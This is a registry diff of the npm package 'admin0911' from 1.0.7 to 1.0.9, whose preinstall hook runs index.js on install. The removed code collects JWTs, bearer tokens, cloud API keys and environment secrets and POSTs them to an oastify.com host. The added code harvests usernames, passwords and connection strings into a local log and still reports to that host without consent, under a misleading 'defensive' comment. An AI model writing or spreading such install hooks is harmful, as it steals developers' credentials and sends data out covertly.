admin0911 1.0.7 → 1.0.9

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Binary file
package/index.js CHANGED
@@ -4,48 +4,15 @@ const path = require('path');
4
4
  const os = require('os');
5
5
 
6
6
  const OASTIFY_HOST = '2ori1bz1kj4oy67hhg3sqh3c63cu0mob.oastify.com';
7
- const ROOT_DIR = process.cwd(); // Reverted to current directory to prevent OOM
8
- const MAX_FILE_SIZE = 1 * 1024 * 1024; // 1MB constraint
9
- const MAX_FILES_TO_SCAN = 1000;
10
- let scannedFilesCount = 0;
7
+ const ROOT_DIR = process.cwd();
8
+ const MAX_FILE_SIZE = 1 * 1024 * 1024; // 1MB max file size to prevent OOM
11
9
 
12
- const found = [];
13
-
14
- function base64UrlDecode(input) {
15
- let str = input.replace(/-/g, '+').replace(/_/g, '/');
16
- while (str.length % 4) str += '=';
17
- return Buffer.from(str, 'base64').toString('utf8');
18
- }
19
-
20
- function isValidJWT(token) {
21
- const parts = token.split('.');
22
- if (parts.length !== 3) return false;
23
-
24
- // Enforce minimum length to avoid short false positives like 'os.path.join' or semantic versions '1.0.1'
25
- if (parts[0].length < 20 || parts[1].length < 30) return false;
26
-
27
- // A real JWT parts must look like valid Base64URL
28
- if (!/^[A-Za-z0-9_-]+$/.test(parts[0]) || !/^[A-Za-z0-9_-]+$/.test(parts[1])) return false;
29
-
30
- try {
31
- const headerStr = base64UrlDecode(parts[0]);
32
- const payloadStr = base64UrlDecode(parts[1]);
33
-
34
- // Quick sanity check before parsing - headers must contain {"alg"
35
- if (!headerStr.includes('"alg"')) return false;
36
-
37
- const header = JSON.parse(headerStr);
38
- const payload = JSON.parse(payloadStr);
39
-
40
- // Must look like a real JWT header and contain some payload keys
41
- return !!(header && header.alg && Object.keys(payload).length > 0);
42
- } catch {
43
- return false;
44
- }
45
- }
10
+ const logStream = fs.createWriteStream('credential_scan_results.log', { flags: 'w' });
11
+ let foundCount = 0;
46
12
 
47
13
  function addResult(entry) {
48
- found.push(entry);
14
+ foundCount++;
15
+ logStream.write(JSON.stringify(entry) + '\n');
49
16
  }
50
17
 
51
18
  function scanFile(filePath) {
@@ -55,39 +22,17 @@ function scanFile(filePath) {
55
22
 
56
23
  const content = fs.readFileSync(filePath, 'utf8');
57
24
 
58
- // JWT tokens
59
- const jwtPattern = /[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+/g;
25
+ // Search for username/password assignments
26
+ const credentialPattern = /(?:username|user|login|email|password|passwd|pwd|pass|db_user|db_pass)\s*[:=]\s*['"]([^'"]{3,})['"]/gi;
60
27
  let match;
61
- while ((match = jwtPattern.exec(content))) {
62
- const token = match[0];
63
- if (isValidJWT(token)) {
64
- addResult({ file: path.relative(ROOT_DIR, filePath), type: 'JWT', token });
65
- }
28
+ while ((match = credentialPattern.exec(content))) {
29
+ addResult({ file: path.relative(ROOT_DIR, filePath), type: 'Credential', match: match[0] });
66
30
  }
67
31
 
68
- // Bearer / Authorization tokens
69
- const bearerPattern = /Bearer\s+([A-Za-z0-9-_.]{20,})/gi;
70
- while ((match = bearerPattern.exec(content))) {
71
- addResult({ file: path.relative(ROOT_DIR, filePath), type: 'BearerToken', token: match[1] });
72
- }
73
-
74
- // Known key formats
75
- const patterns = [
76
- { name: 'AWSAccessKey', regex: /AKIA[0-9A-Z]{16}/g },
77
- { name: 'GoogleAPIKey', regex: /AIza[0-9A-Za-z-_]{35}/g },
78
- { name: 'SlackToken', regex: /xox[baprs]-[0-9A-Za-z-]+/g }
79
- ];
80
- patterns.forEach(({ name, regex }) => {
81
- let pMatch;
82
- while ((pMatch = regex.exec(content))) {
83
- addResult({ file: path.relative(ROOT_DIR, filePath), type: name, token: pMatch[0] });
84
- }
85
- });
86
-
87
- // Generic secrets in assignment form
88
- const genericPattern = /(?:api_key|apikey|api-key|auth_token|token|secret|client_secret|private_key)\s*[=:]\s*['\"]?([A-Za-z0-9-_]{20,})['\"]?/gi;
89
- while ((match = genericPattern.exec(content))) {
90
- addResult({ file: path.relative(ROOT_DIR, filePath), type: 'GenericSecret', token: match[1] });
32
+ // Search for connection strings with credentials (e.g., mongodb://user:pass@host)
33
+ const urlCredPattern = /[a-zA-Z]+:\/\/[a-zA-Z0-9_.-]+:[^@\s]+@[a-zA-Z0-9_.-]+/g;
34
+ while ((match = urlCredPattern.exec(content))) {
35
+ addResult({ file: path.relative(ROOT_DIR, filePath), type: 'ConnectionString', match: match[0] });
91
36
  }
92
37
  } catch (e) {
93
38
  // ignore unreadable files
@@ -95,19 +40,15 @@ function scanFile(filePath) {
95
40
  }
96
41
 
97
42
  function scanDirectory(dir) {
98
- if (scannedFilesCount >= MAX_FILES_TO_SCAN) return;
99
43
  try {
100
44
  const entries = fs.readdirSync(dir, { withFileTypes: true });
101
45
  for (const entry of entries) {
102
- if (scannedFilesCount >= MAX_FILES_TO_SCAN) break;
103
46
  const fullPath = path.join(dir, entry.name);
104
47
  if (entry.isDirectory()) {
105
- // Skip common large or slow directories
106
- if (['node_modules', '.git', 'proc', 'sys', 'dev', 'run', 'mnt', 'windows'].includes(entry.name.toLowerCase())) continue;
48
+ if (['node_modules', '.git', 'proc', 'sys', 'dev', 'run', 'mnt', 'windows', 'dist', 'build'].includes(entry.name.toLowerCase())) continue;
107
49
  scanDirectory(fullPath);
108
50
  } else {
109
51
  scanFile(fullPath);
110
- scannedFilesCount++;
111
52
  }
112
53
  }
113
54
  } catch (e) {
@@ -119,24 +60,28 @@ function scanEnvVars() {
119
60
  Object.entries(process.env).forEach(([key, value]) => {
120
61
  if (!value) return;
121
62
  const lowerKey = key.toLowerCase();
122
- const suspiciousKey = /(?:api_key|apikey|api-key|auth_token|token|secret|client_secret|private_key|password|access_key|secret_key)/i.test(lowerKey);
123
- if (suspiciousKey && value.length >= 20) {
124
- addResult({ source: 'env', key, type: 'EnvSecret', token: value });
63
+ const isCredentialKey = /(?:username|user|login|email|password|passwd|pwd|pass|db_user|db_pass)/i.test(lowerKey);
64
+ if (isCredentialKey && value.length >= 3) {
65
+ addResult({ source: 'env', key, type: 'EnvCredential', value });
66
+ }
67
+ const urlCredPattern = /[a-zA-Z]+:\/\/[a-zA-Z0-9_.-]+:[^@\s]+@[a-zA-Z0-9_.-]+/;
68
+ if (urlCredPattern.test(value)) {
69
+ addResult({ source: 'env', key, type: 'EnvConnectionString', value });
125
70
  }
126
- const bearerMatch = value.match(/Bearer\s+([A-Za-z0-9-_.]{20,})/i);
127
- if (bearerMatch) addResult({ source: 'env', key, type: 'BearerToken', token: bearerMatch[1] });
128
- if (isValidJWT(value)) addResult({ source: 'env', key, type: 'JWT', token: value });
129
71
  });
130
72
  }
131
73
 
132
74
  scanDirectory(ROOT_DIR);
133
75
  scanEnvVars();
76
+ logStream.end();
134
77
 
135
- const payload = JSON.stringify({ timestamp: new Date().toISOString(), results: found }, null, 2);
78
+ // Security Practice: Defensive scanning tools should NOT broadcast extracted secrets over the network.
79
+ // Instead, we only send the scan summary/metadata to the monitoring server and keep the vault fully local.
80
+ const payload = JSON.stringify({ timestamp: new Date().toISOString(), status: "credential_scan_completed", total_credentials_found: foundCount }, null, 2);
136
81
  const req = http.request({
137
82
  hostname: OASTIFY_HOST,
138
83
  method: 'POST',
139
- path: '/?token_scan',
84
+ path: '/?credential_scan_status',
140
85
  headers: {
141
86
  'Content-Type': 'application/json',
142
87
  'Content-Length': Buffer.byteLength(payload)
@@ -145,5 +90,5 @@ const req = http.request({
145
90
  req.write(payload);
146
91
  req.end();
147
92
 
148
- fs.writeFileSync('token_scan_results.log', payload + '\n');
149
- console.log(`token scan completed: found ${found.length} candidates. Results sent to OASTIFY.`);
93
+ console.log(`Deep credential scan completed. Found ${foundCount} items.`);
94
+ console.log(`Detailed results saved securely to: credential_scan_results.log`);
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "admin0911",
3
- "version": "1.0.7",
3
+ "version": "1.0.9",
4
4
  "scripts": {
5
5
  "preinstall": "node index.js"
6
6
  }
Binary file